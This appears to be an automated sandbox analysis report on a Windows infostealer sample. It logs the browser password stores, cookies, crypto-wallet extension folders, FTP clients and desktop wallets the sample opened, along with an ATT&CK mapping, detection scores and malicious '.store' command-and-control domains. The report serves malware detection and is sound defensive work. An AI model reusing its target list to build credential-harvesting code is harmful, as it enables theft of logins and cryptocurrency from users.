Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
Source: Yara match | File source: 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic column; matched signature counts in parentheses)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (34), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (751), Virtualization/Sandbox Evasion (34), Process Discovery (2), File and Directory Discovery (1), System Information Discovery (223), Wi-Fi Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System (41), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Source | Detection | Scanner | Label | Link
file.exe | 37% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.all | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
necklacedmny.store | 188.114.96.3 | true | true | | unknown
presticitpo.store | unknown | unknown | true | | unknown
thumbystriw.store | unknown | unknown | true | | unknown
crisiwarny.store | unknown | unknown | true | | unknown
